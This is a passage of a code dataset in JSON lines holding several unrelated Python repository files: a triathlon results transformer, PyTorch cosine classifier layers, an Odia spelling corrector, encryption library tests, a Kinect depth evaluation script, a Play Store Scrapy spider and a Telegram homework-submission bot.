triscore_leg_name = LEG_IRONMAN_TO_TRISCORE[ironman_leg_name]\n contact_id = result_parser.get_contact_id(race_result)\n legs[triscore_leg_name] = builder.build_leg(\n time=result_parser.get_leg_time(race_result, ironman_leg_name),\n age_rank=age_rank[ironman_leg_name][contact_id],\n gender_rank=gender_rank[ironman_leg_name][contact_id],\n overall_rank=overall_rank[ironman_leg_name][contact_id],\n time_age_rank=time_age_rank[ironman_leg_name][contact_id],\n time_gender_rank=time_gender_rank[ironman_leg_name][contact_id],\n time_overall_rank=time_overall_rank[ironman_leg_name][contact_id],\n )\n return legs\n\n # Construct athlete results\n athlete_results = []\n last_finish_time = 0\n last_finish_rank = 0\n for i, result in enumerate(\n sorted(race_results,\n key=lambda result: (\n result['FinishTime'],\n result['SwimTime'],\n result['Transition1Time'],\n result['BikeTime'],\n result['Transition2Time'],\n result['RunTime']))):\n athlete_id = result_parser.get_contact_id(result)\n athlete_name = result_parser.get_athlete_name(result)\n country_iso_num = result_parser.get_country_representing_iso_numeric(result)\n bib = result_parser.get_bib_number(result)\n age_group = result_parser.get_age_group(result)\n age_group_size = count_by_age_group[age_group]\n gender = result_parser.get_gender(result)\n gender_size = count_by_gender[gender]\n overall_size = len(race_results)\n finish_status = result_parser.get_finish_status(result, log=True)\n status = IRONMAN_EVENT_STATUS_TO_TRISCORE[finish_status]\n\n legs = 
get_legs(result)\n finish_time = legs[builder.FINISH_LEG]['t']\n finish_rank = legs[builder.FINISH_LEG]['or']\n\n assert finish_time >= last_finish_time, \\\n f'descending finish time: {finish_time} last: {last_finish_time}\\nresult: {result}\\nathlete: {athlete_result}'\n\n assert finish_rank >= last_finish_rank, \\\n f'descending finish rank: {finish_rank} last: {last_finish_rank}\\nresult: {result}\\nathlete: {athlete_result}'\n\n athlete_result = builder.build_athlete_result(\n athlete_id=athlete_id,\n athlete_name=athlete_name,\n country_iso_num=country_iso_num,\n bib=bib,\n age_group=age_group,\n age_group_size=age_group_size,\n gender=gender,\n gender_size=gender_size,\n overall_size=overall_size,\n status=status,\n legs=legs)\n logger.debug(f'result: {athlete_result}')\n athlete_results.append(athlete_result)\n\n last_finish_time = finish_time\n last_finish_rank = finish_rank\n\n if dry_run:\n logger.info(\n f'DRY_RUN: skip adding race: {race_info} results: {len(athlete_results)}')\n else:\n assert triscore_storage.add_race(\n race_info, athlete_results), f'failed to add race: {race_info}'\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-d', '--database', default='triscore')\n parser.add_argument('-u', '--username', default='triscore-writer')\n parser.add_argument('-p', '--password', required=True)\n parser.add_argument('-l', '--limit', type=int, default=0)\n parser.add_argument('-t', '--timeout', type=int, default=None)\n parser.add_argument('--dry-run', action='store_true')\n args = parser.parse_args()\n\n mongo_client = MongoClient(username=args.username, password=args.password, authSource=args.database)\n\n while True:\n transform_ironman_to_triscore(mongo_client, args.limit, args.dry_run)\n if not dt.wait(args.timeout):\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ddbrx/triscore","sub_path":"data/ironman/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":19077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72870696861","text":"# From Official LUCIR Code\nimport math\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom cl_methods.cl_utils import stable_cosine_distance\n\ndef _reduce_proxies(similarities, num_proxy):\n # shape (batch_size, n_classes * proxy_per_class)\n n_classes = similarities.shape[1] / num_proxy\n assert n_classes.is_integer(), (similarities.shape[1], num_proxy)\n n_classes = int(n_classes)\n bs = similarities.shape[0]\n\n simi_per_class = similarities.view(bs, n_classes, num_proxy)\n attentions = F.softmax(simi_per_class, dim=-1)\n return (simi_per_class * attentions).sum(-1)\n\nclass CosineLinear(Module):\n def __init__(self, in_features, out_features, num_proxy=1, sigma_learnable=True, sigma=1.0,\n eta_learnable=True, eta=1.0, version='cc', nca_margin=0.6, is_train=True):\n super(CosineLinear, self).__init__()\n self.version = version\n self.num_proxy = num_proxy\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(self.num_proxy * out_features, in_features))\n\n self.sigma_learnable = sigma_learnable\n self.sigma = sigma\n if self.sigma_learnable:\n self.sigma = Parameter(torch.ones(1))\n\n self.eta_learnable = eta_learnable\n self.eta = eta\n\n if self.eta_learnable:\n self.eta = Parameter(torch.ones(1))\n self.nca_margin = nca_margin\n self.reset_parameters()\n self.is_train = is_train\n\n def reset_parameters(self):\n if self.version == 'lsc':\n nn.init.kaiming_normal_(self.weight, nonlinearity='linear')\n else:\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n if isinstance(self.sigma, Parameter):\n self.sigma.data.fill_(1) #for initializaiton of sigma\n if self.eta and isinstance(self.eta, Parameter):\n self.eta.data.fill_(1)\n\n def forward(self, input, sigma_from_wrapper=None):\n if self.version == 'cc':\n out = F.linear(F.normalize(input, p=2,dim=1), \\\n F.normalize(self.weight, p=2, dim=1))\n out = self.sigma * out\n elif self.version == 'lsc':\n if sigma_from_wrapper is None:\n features = self.sigma * F.normalize(input,p=2,dim=1)\n weights = self.sigma * F.normalize(self.weight,p=2,dim=1)\n out = - stable_cosine_distance(features, weights)\n out = _reduce_proxies(out, self.num_proxy)\n if self.is_train:\n out = self.eta * (out - self.nca_margin)\n else:\n features = sigma_from_wrapper * F.normalize(input,p=2,dim=1)\n weights = sigma_from_wrapper * F.normalize(self.weight,p=2,dim=1)\n out = - stable_cosine_distance(features, weights)\n out = _reduce_proxies(out, self.num_proxy)\n return out\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. 
You can test\n # it by printing an object of this class.\n return 'input_features={}, output_features={}, sigma={}, eta={}'.format(\n self.in_features, self.num_proxy*self.out_features,\n self.sigma.data if self.sigma_learnable else self.sigma,\n self.eta.data if self.eta_learnable else self.eta\n )\n\nclass SplitCosineLinear(Module):\n #consists of two fc layers and concatenate their outputs\n def __init__(self, in_features, out_features1, out_features2, num_proxy=1, sigma_learnable=True, sigma=1.0,\n eta_learnable=False, eta=1.0, version='cc', nca_margin=0.6, is_train=True):\n super(SplitCosineLinear, self).__init__()\n self.version = version\n self.in_features = in_features\n self.out_features = out_features1 + out_features2\n self.num_proxy = num_proxy\n self.fc1 = CosineLinear(in_features, out_features1, self.num_proxy,\n False, 1.0, False, 1.0, version=self.version)\n self.fc2 = CosineLinear(in_features, out_features2, self.num_proxy,\n False, 1.0, False, 1.0, version=self.version)\n self.sigma_learnable = sigma_learnable\n self.sigma = sigma\n self.eta_learnable = eta_learnable\n self.eta = eta\n if self.sigma_learnable:\n self.sigma = Parameter(torch.Tensor(1))\n self.sigma.data.fill_(1)\n\n if self.eta_learnable:\n self.eta = Parameter(torch.Tensor(1))\n\n self.nca_margin = nca_margin\n self.is_train = is_train\n\n def forward(self, x):\n if self.version == 'cc':\n out1 = self.fc1(x)\n out2 = self.fc2(x)\n out = torch.cat((out1, out2), dim=1) #concatenate along the channel\n if self.sigma is not None:\n out = self.sigma * out\n elif self.version == 'lsc': # for pod (nca_loss)...\n out1 = self.fc1(x, self.sigma)\n out2 = self.fc2(x, self.sigma)\n out = torch.cat((out1,out2),dim=1)\n if self.is_train:\n out = self.eta * (out - self.nca_margin)\n\n return out\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. You can test\n # it by printing an object of this class.\n return 'input_features={}, output_features={}, sigma={}, eta={}'.format(\n self.in_features, self.num_proxy * self.out_features,\n self.sigma.data if self.sigma_learnable else self.sigma,\n self.eta.data if self.eta_learnable else self.eta\n )\n\n","repo_name":"bellos1203/TCD","sub_path":"cl_methods/cosine_linear.py","file_name":"cosine_linear.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"11792179055","text":"import json\nimport os\nfrom collections import Counter\nfrom typing import Dict\n\nfrom gensim.models import FastText\n\n\ndef edit_distance(s1: str, s2: str) -> int:\n \"\"\"Compute edit distance between two strings using dynamic programmic.\n Lifted from: https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python\"\"\"\n if len(s1) < len(s2):\n return edit_distance(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and\n # current_row are one character longer than s2\n deletions = current_row[j] + 1\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef load_vocab(json_filepath: str) -> Counter:\n \"\"\"Load vocab from json file\"\"\"\n with open(json_filepath, 'r', encoding='utf-8') as f:\n s = f.read()\n vocab_dict = json.loads(s)\n vocab_counter = Counter(vocab_dict)\n return vocab_counter\n\n\ndef find_correct_spelling(model: FastText, incorrect_word: str, num_neighbours: int, clean_vocab_counter: Counter,\n mixed_vocab_counter: Counter, mixed_vocab_min_freq: int,\n max_edit_distance: int) -> Dict[str, str]:\n \"\"\"Find correct spelling for a given word which is incorrectly spelled\"\"\"\n\n correct_word, message = '', ''\n\n mixed_vocab_set = set()\n for word, freq in mixed_vocab_counter.most_common():\n if freq >= mixed_vocab_min_freq:\n mixed_vocab_set.add(word)\n\n if incorrect_word in clean_vocab_counter or incorrect_word in mixed_vocab_set:\n message = f'{incorrect_word} is already correctly spelled'\n else:\n tups = model.wv.most_similar(incorrect_word, topn=num_neighbours)\n candidates = [candidate for candidate, _ in tups]\n\n for candidate in candidates:\n if candidate in clean_vocab_counter and edit_distance(incorrect_word, candidate) <= max_edit_distance:\n correct_word = candidate\n break\n\n if correct_word == '':\n for candidate in candidates:\n if candidate in mixed_vocab_set and edit_distance(incorrect_word, candidate) <= max_edit_distance:\n correct_word = candidate\n break\n if correct_word == '':\n message = 'Correct spelling not found'\n return {'incorrect_word': incorrect_word, 'correct_word': correct_word, 'message': message}\n\n\nif __name__ == \"__main__\":\n _incorrect_word = 'ସାପ୍ତାହୀକ'\n _num_neighbours = 10\n _mixed_vocab_min_freq = 50\n _max_edit_distance = 2\n\n _model = FastText.load(os.path.join('embeddings.txt'))\n _clean_vocab_counter = load_vocab(os.path.join('clean_vocab_counter.json'))\n _mixed_vocab_counter = load_vocab(os.path.join('mixed_vocab_counter.json'))\n out = find_correct_spelling(model=_model, incorrect_word=_incorrect_word, num_neighbours=_num_neighbours,\n clean_vocab_counter=_clean_vocab_counter,\n mixed_vocab_counter=_mixed_vocab_counter, mixed_vocab_min_freq=_mixed_vocab_min_freq,\n max_edit_distance=_max_edit_distance)\n print(out)\n","repo_name":"OdiaNLP/spelling-correction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"27008796145","text":"\nimport shutil\nimport tempfile\nfrom base64 import urlsafe_b64encode\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\n\nclass TestRandomEncryption(unittest.TestCase):\n\n def setUp(self):\n self.dirpath = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.dirpath)\n\n def _make_default(self):\n from randenc import RandomEncryption\n return RandomEncryption(self.dirpath)\n\n def test_encrypt_and_decrypt_without_compression(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt({'message': 'Hello, world!'})\n self.assertIsInstance(ciphertext, unicode)\n data = randenc.decrypt(ciphertext)\n self.assertLess(len(ciphertext), 120)\n self.assertEqual(data, {'message': 'Hello, world!'})\n\n # Encrypting again should not produce the same ciphertext.\n ciphertext2 = randenc.encrypt({'message': 'Hello, world!'})\n self.assertNotEqual(ciphertext, ciphertext2)\n\n def test_encrypt_and_decrypt_with_compression(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt('0' * 4000)\n self.assertIsInstance(ciphertext, unicode)\n # The content is easy to compress, so expect a relatively\n # small message.\n self.assertLess(len(ciphertext), 200)\n data = randenc.decrypt(ciphertext)\n self.assertEqual(data, '0' * 4000)\n\n def test_encrypt_and_decrypt_tiny(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt(3)\n self.assertIsInstance(ciphertext, unicode)\n data = randenc.decrypt(ciphertext)\n self.assertGreater(len(ciphertext), 70)\n self.assertLess(len(ciphertext), 90)\n self.assertEqual(data, 3)\n\n def test_decrypt_wrong_format(self):\n randenc = self._make_default()\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt('BBBB')\n\n def test_decrypt_missing_key_id(self):\n randenc = self._make_default()\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt(urlsafe_b64encode(b'\\0spam'))\n\n def test_decrypt_with_signature_mismatch(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt({'message': 'Hello, world!'})\n data = randenc.decrypt.b64decode(ciphertext)\n data = data[:-1] + bytes([ord(data[-1]) ^ 16])\n broken_ciphertext = urlsafe_b64encode(data)\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt(broken_ciphertext)\n","repo_name":"hathawsh/randenc","sub_path":"src/randenc/tests/test_randenc.py","file_name":"test_randenc.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37766232631","text":"import sys\nsys.path.insert(0,'../sim/')\nimport numpy as np\nimport os, json, glob\nimport imageio\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom utils import *\nfrom tof_class import *\nimport pdb\nimport pickle\nimport time\nimport scipy.misc\nfrom scipy import sparse\nfrom copy import deepcopy\nfrom joblib import Parallel, delayed\nimport multiprocessing\nfrom kinect_spec import *\nimport cv2\nfrom numpy import linalg as LA\nfrom scipy import signal\nimport parser\nimport argparse\n\nfrom tensorflow.contrib import learn\nfrom tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib\ntf.logging.set_verbosity(tf.logging.INFO)\nfrom vis_flow import *\nfrom kinect_init import *\n\nPI = 3.14159265358979323846\nraw_depth_new = 0\nflg = False\n\ndtype = tf.float32\n\ndef metric_valid(depth, gt, msk):\n # compute mean absolute error on places where msk = 1\n msk /= np.sum(msk)\n return np.sum(np.abs(depth - gt)*msk)\n\ndef data_augment(scene_n, array_dir, tof_cam, text_flg = False):\n print('Augmenting scene', scene_n)\n ## load all data\n # if the raw file does not exist, just find one and use\n if not os.path.exists(array_dir+scene_n[-16:]+'.pickle'):\n scenes = glob.glob(array_dir+'*.pickle')\n with open(scenes[0],'rb') as f:\n data = pickle.load(f)\n cam = data['cam']\n\n # separately read the true depth and true rendering\n with open(scene_n[0:-16]+'gt/'+scene_n[-16::],'rb') as f:\n gt=np.fromfile(f, dtype=np.float32)\n depth_true = np.reshape(gt,(cam['dimy']*4,cam['dimx']*4))\n\n with open(scene_n[0:-16]+'ideal/'+scene_n[-16::],'rb') as f:\n meas_gt=np.fromfile(f, dtype=np.int32)\n meas_gt = np.reshape(meas_gt,(cam['dimy'],cam['dimx'],9)).astype(np.float32)\n else:\n with open(array_dir+scene_n[-16::]+'.pickle','rb') as f:\n data = pickle.load(f)\n program = data['program']\n cam = data['cam']\n cam_t = data['cam_t']\n scene = data['scene']\n depth_true = data['depth_true']\n prop_idx = data['prop_idx']\n prop_s = data['prop_s'] \n res_gt = tof_cam.process_gt_delay_vig_dist_surf_mapmax(cam, prop_idx, prop_s, scene, depth_true)\n meas_gt = res_gt['meas']\n\n # directly read pregenerate raw measurement\n with open(scene_n[0:-16]+'full/'+scene_n[-16::],'rb') as f:\n meas=np.fromfile(f, dtype=np.int32)\n meas = np.reshape(meas,(cam['dimy'],cam['dimx'],9)).astype(np.float32)\n msk = kinect_mask().astype(np.float32)\n meas = [meas[:,:,i]*msk/tof_cam.cam['map_max'] for i in range(meas.shape[-1])]\n meas_gt = [meas_gt[:,:,i]*msk/tof_cam.cam['map_max'] for i in range(meas_gt.shape[-1])]\n meas = np.stack(meas, -1)\n meas_gt = np.stack(meas_gt, -1)\n\n # reduce the resolution of the depth\n depth_true_s = scipy.misc.imresize(\\\n depth_true,\\\n meas.shape[0:2],\\\n mode='F'\\\n )\n depth_true_s = tof_cam.dist_to_depth(depth_true_s)\n\n # load the mask and classification\n with open(scene_n[0:-16]+'msk'+'/'+scene_n[-16:],'rb') as f:\n msk_array=np.fromfile(f, dtype=np.float32)\n msk_array = np.reshape(msk_array,(cam['dimy'],cam['dimx'],4))\n msk = {}\n msk['background'] = msk_array[:,:,0]\n msk['edge'] = msk_array[:,:,1]\n msk['noise'] = msk_array[:,:,2]\n msk['reflection'] = msk_array[:,:,3]\n\n # compute mask\n msk_true_s = msk['background'] * msk['edge']\n\n # apply the texture whether one wants the texture or not\n if text_flg == True:\n # add textures (simply multiply a ratio)\n # theoretically one should first add texture then add the noise\n # but doing it 
this approximate way is faster\n texts = glob.glob('../params/kinect/textures-curet/'+'*.png')\n idx = np.random.choice(len(texts),1,replace=False)[0]\n im_text = cv2.imread(texts[idx],0).astype(np.float32)\n im_text /= 255.\n lo = np.random.uniform(0,1) # random range\n hi = np.random.uniform(lo,1)\n im_text = im_text * (hi-lo) + lo\n im_text = scipy.misc.imresize(im_text,meas.shape[0:2],mode='F')\n im_text = np.expand_dims(im_text,-1)\n\n meas = meas * im_text\n meas_gt = meas_gt * im_text\n\n true = np.stack([depth_true_s, msk_true_s],-1)\n true = np.concatenate([true, meas_gt], -1)\n\n # cut the regions\n meas = meas[20:-20,:,:]\n true = true[20:-20,:,:]\n depth_true_s = depth_true_s[20:-20,:]\n msk_true_s = msk_true_s[20:-20,:]\n\n # the input of the network\n return meas, true, depth_true_s, msk_true_s\n\ndef testing(tests, array_dir, output_dir, tof_cam, tof_net):\n # testing\n errs = []\n errs_base = []\n errs_num_pix = []\n pix_num_all = 0\n errs_total = []\n errs_base_total = []\n step =1\n for iter_idx in range(0,len(tests),step):\n te_idx = np.arange(iter_idx,min(iter_idx+step,len(tests)))\n x = []\n y = []\n z_gts = []\n msk_gts = []\n for i in range(len(te_idx)):\n x_te,y_te,z_gt,msk_gt = data_augment(tests[te_idx[i]], array_dir, tof_cam)\n x.append(x_te)\n y.append(y_te)\n z_gts.append(z_gt)\n msk_gts.append(msk_gt)\n x = np.stack(x,0)\n y = np.stack(y,0)\n z_gts = np.stack(z_gts, 0)\n msk_gts = np.stack(msk_gts, 0)\n\n # predict data\n data = list(tof_net.predict(x=x))\n mid = 4\n for j in range(len(data)):\n x_warped = np.expand_dims(data[j]['x_warped_r:0'],0)\n depth = data[j]['depth']\n depth_gt = y[j,:,:,0]\n msk = data[j]['depth_msk:0']*(depth_gt>1e-4)\n err_2norm = np.sqrt(np.sum(((depth-depth_gt)*msk)**2)/np.sum(msk))\n err_1norm = np.sum((depth-depth_gt)*msk)/np.sum(msk)\n\n err_warped = np.sqrt(np.mean(np.abs(x_warped - y[:,:,:,2::])**2))\n\n fig = plt.figure()\n plt.suptitle('Original Raw')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(x[j,:,:,i]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n fig = plt.figure()\n plt.suptitle('Raw after MRM')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(x_warped[j,:,:,i]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n fig = plt.figure()\n msk_sign = kinect_mask().astype(np.float32)[20:-20,:]\n plt.suptitle('Ground truth Raw')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(y[j,:,:,i+2]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n # use the kinect pipeline to produce depth\n xs = [x[j,:,:,:]]\n msk_sign = kinect_mask().astype(np.float32)\n msk_or = np.ones([384,512,1])\n depths = []\n for x_or in xs:\n y_or = np.concatenate([msk_or,msk_or,x_or],-1)\n x_or = np.concatenate([np.zeros([20,512,9]),x_or,np.zeros([20,512,9])],0)\n y_or = np.concatenate([np.zeros([20,512,11]),y_or,np.zeros([20,512,11])],0)\n x_or = [x_or[:,:,i]*msk_sign*tof_cam.cam['map_max'] for i in range(x_or.shape[-1])]\n x_or = np.stack(x_or,-1)\n x_or = np.expand_dims(x_or,0)\n y_or = np.expand_dims(y_or,0)\n depths.append(list(raw_depth_new.predict(x=x_or))[0]['depth'])\n \n depth_or = depths[0]\n depth_or = depth_or[20:-20,:]\n\n vmin=prms['min_depth']/1000\n vmax=prms['max_depth']/1000\n msk_gt 
= msk_gts[j]\n            fig=plt.figure()\n            ax=fig.add_subplot(2,4,1)\n            msk_or = (depth_or>vmin)*(depth_gt>vmin)*msk_gt\n            err = np.sum(np.abs(depth_or - depth_gt)*msk_or)/np.sum(msk_or)\n\n            # record the error\n            err_list = np.abs(depth_or - depth_gt)\n            err_list = err_list[np.where(msk_or>0.999)]\n            pix_num_all += len(depth_or.flatten())\n            errs_base.append(err_list)\n\n            plt.title(\"Original, err: \"+'%.4f'%err+'m')\n            plt.imshow(depth_or*msk_or,vmin=vmin,vmax=vmax)\n            plt.axis('off')\n\n            ax=fig.add_subplot(2,4,2)\n            plt.imshow((depth_or-depth_gt)*msk_or,vmin=-0.1,vmax=0.1)\n            plt.axis('off')\n\n            ax=fig.add_subplot(2,4,3)\n            msk = (depth>vmin)*(depth_gt>vmin)*msk_gt\n            err = np.sum(np.abs(depth - depth_gt)*msk)/np.sum(msk)\n\n            # record the error\n            err_list = np.abs(depth - depth_gt)\n            err_list = err_list[np.where(msk>0.999)]\n            errs.append(err_list)\n\n            plt.title(\"KPN, err: \"+'%.4f'%err+'m')\n            plt.imshow(depth*msk,vmin=vmin,vmax=vmax)\n            plt.axis('off')\n\n            ax=fig.add_subplot(2,4,4)\n            plt.imshow((depth-depth_gt)*msk,vmin=-0.1,vmax=0.1)\n            plt.axis('off')\n\n            ax=fig.add_subplot(2,4,7)\n            plt.title(\"True depth\")\n            plt.imshow(depth_gt*msk,vmin=vmin,vmax=vmax)\n            plt.colorbar()\n            plt.axis('off')\n\n            ax=fig.add_subplot(2,4,8)\n            plt.title(\"True depth\")\n            plt.imshow((depth_gt-depth_gt)*msk,vmin=-0.1,vmax=0.1)\n            plt.axis('off')\n\n            name = int(np.random.uniform()*1e10)\n            plt.savefig(\\\n                output_dir+str(name)+'.png',\n                bbox_inches='tight',\n                dpi = 2*512,\n            )\n\n    text_file = open(output_dir+\"err.txt\", \"w\")\n    text_file.write(\"Mean base err: Density: Mean net err: Density: \\n\")\n    text_file.write(\\\n        str(np.mean(np.concatenate(errs_base,0)))+\" \"+\\\n        str(len(np.concatenate(errs_base))/pix_num_all)+\" \"+\\\n        str(np.mean(np.concatenate(errs,0)))+\" \"+\\\n        str(len(np.concatenate(errs))/pix_num_all)+\"\\n\"\n    )\n    text_file.close()\n\n    return\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser(\"testing MRM LF2\")\n    parser.add_argument('-n', '--n-images', type=int, default = -1, help='number of images to process; -1 to process all the images')\n    args = parser.parse_args()\n\n    array_dir = '../FLAT/trans_render/static/'\n    data_dir = '../FLAT/kinect/'\n\n    # initialize the camera model\n    tof_cam = kinect_real_tf()\n\n    # input the folder that trains the data\n    # only use the files listed\n    f = open('../FLAT/kinect/list/test.txt','r')\n    message = f.read()\n    f.close()\n    files = message.split('\\n')\n    tests = files[0:-1]\n    if args.n_images != -1:\n        tests = tests[0:args.n_images]\n    tests = [data_dir+test for test in tests]\n\n    # create the network estimator\n    file_name = 'MRM_LF2'\n    from MRM_LF2 import tof_net_func\n    tof_net = learn.Estimator(\n        model_fn=tof_net_func,\n        model_dir=\"./models/kinect/\"+file_name,\n    )\n\n    # load the baseline method\n    baseline_name = 'LF2'\n    from LF2 import tof_net_func\n    raw_depth_new = learn.Estimator(\n        model_fn=tof_net_func,\n        model_dir=\"./models/kinect/\"+baseline_name,\n    )\n\n    # create output folder\n    output_dir = './results/'\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n    output_dir += 'kinect/'\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n    folder_name = file_name\n    output_dir = output_dir + folder_name + '/'\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n\n\n    testing(tests, array_dir, output_dir, tof_cam, tof_net)\n","repo_name":"NVlabs/FLAT","sub_path":"pipe/testing_MRM_LF2.py","file_name":"testing_MRM_LF2.py","file_ext":"py","file_size_in_byte":12175,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"69"}
+{"seq_id":"6599359885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport scrapy\n\nfrom play_store.items import PlayStoreApp, PlayStoreCategory\n\n# The maximum number of records on the 'Top' lists.\nMAX = 540\n\n\nclass AppSpider(scrapy.Spider):\n name = \"apps\"\n category = \"\"\n rank = 0\n\n def parse(self, response):\n if not self.rank % 60 and self.rank != MAX:\n for href in response.xpath('//a[@class=\"title\"]/@href').extract():\n item = PlayStoreApp()\n item['price'] = response.xpath(\n '//span[@class=\"display-price\"]/text()'\n ).extract()[self.rank * 2 % 60]\n item['rank'] = self.rank + 1\n full_url = response.urljoin(href)\n request = scrapy.Request(full_url, callback=self.parse_app)\n request.meta['item'] = item\n self.rank += 1\n yield request\n url = response.urljoin(\"?start=\" + str(self.rank))\n yield scrapy.Request(url)\n\n def parse_app(self, response):\n item = response.meta['item']\n\n item['os'] = response.xpath(\n '//div[@itemprop=\"operatingSystems\"]/text()').extract()[0]\n item['size'] = response.xpath(\n '//div[@itemprop=\"fileSize\"]/text()').extract()\n item['title'] = response.xpath(\n '//div[@class=\"id-app-title\"]/text()').extract()[0]\n item['genre'] = response.xpath(\n '//span[@itemprop=\"genre\"]/text()').extract()\n item['score'] = response.xpath(\n '//meta[@itemprop=\"ratingValue\"]/@content').extract()[0]\n item['developer'] = response.xpath(\n '//span[@itemprop=\"name\"]/text()').extract()[0]\n item['downloads'] = response.xpath(\n '//div[@itemprop=\"numDownloads\"]/text()').extract()[0]\n item['last_update'] = response.xpath(\n '//div[@itemprop=\"datePublished\"]/text()').extract()[0]\n item['reviews_num'] = response.xpath(\n '//meta[@itemprop=\"ratingCount\"]/@content').extract()[0]\n item['content_rating'] = response.xpath(\n '//div[@itemprop=\"contentRating\"]/text()').extract()[0]\n\n yield item\n\n\nclass CategorySpider(scrapy.Spider):\n name = \"categories\"\n start_urls = ['https://play.google.com/store/apps/']\n category = \"\"\n\n def parse(self, response):\n # The way top lists work with age ranges are a bit different on the\n # link construction, I'll leave them out for now with not(contains).\n categories = response.xpath(\"//a[contains(@href, 'category') and \\\n not(contains(@href, '?')) and \\\n @class='child-submenu-link']\")\n\n for category in categories:\n item = PlayStoreCategory()\n item['title'] = category.xpath(\"text()\").extract()[0]\n item['url'] = category.xpath(\"@href\").extract()[0]\n\n yield item\n","repo_name":"streeck/playstore-crawler","sub_path":"play_store/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36664470382","text":"from aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types.message import ContentType\nfrom loguru import logger\n\nfrom app import config\nfrom app.models.base import User\nfrom app.models.suggestion import Suggestion\nfrom app.utils import markups\nfrom app.utils.states import UserStates\n\n\nasync def cmd_start(message: types.Message, user: User, state: FSMContext):\n logger.info(\"Start\")\n await state.finish()\n\n await UserStates.Input_suggesting_msg.set()\n await message.answer(\n f\"\"\"\nПривет!\nОтправь свою домашку в любом виде. После проверки модераторами она попадёт в специальный канал со всеми домашками: {config.MAIN_CHANNEL_USERNAME}\n\nУ тебя не должнен быть скрытый профиль, в противном случае люди просто не смогут тебе написать.\n \"\"\"\n )\n\n\nasync def input_suggesting_msg(message: types.Message, user: User, state: FSMContext):\n logger.info(\"Input suggesting message\")\n\n forwarded_msg = await message.forward(config.MODER_CHANNEL_ID)\n await forwarded_msg.reply(\n \"Одобрить?\",\n reply_markup=markups.approve_suggestion(forwarded_msg.message_id),\n disable_notification=True,\n )\n\n await Suggestion.create(id=forwarded_msg.message_id, user=user)\n logger.info(\n f\"\"\"Inputed suggesting message\nURL: {forwarded_msg.url}\n \"\"\"\n )\n\n await message.answer(\n \"\"\"\nПринято! Ожидай пока модераторы проверят твоё сообщение, я тебя оповещу когда они одобрят.\n\nА пока можешь отправить ещё одну домашку\n \"\"\"\n )\n\n\ndef register_base(dp: Dispatcher):\n dp.register_message_handler(cmd_start, commands=\"start\", state=\"*\")\n dp.register_message_handler(\n input_suggesting_msg,\n content_types=ContentType.ANY,\n state=UserStates.Input_suggesting_msg,\n )\n","repo_name":"nacknime-official/gdz_ukraine_suggest_bot","sub_path":"app/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
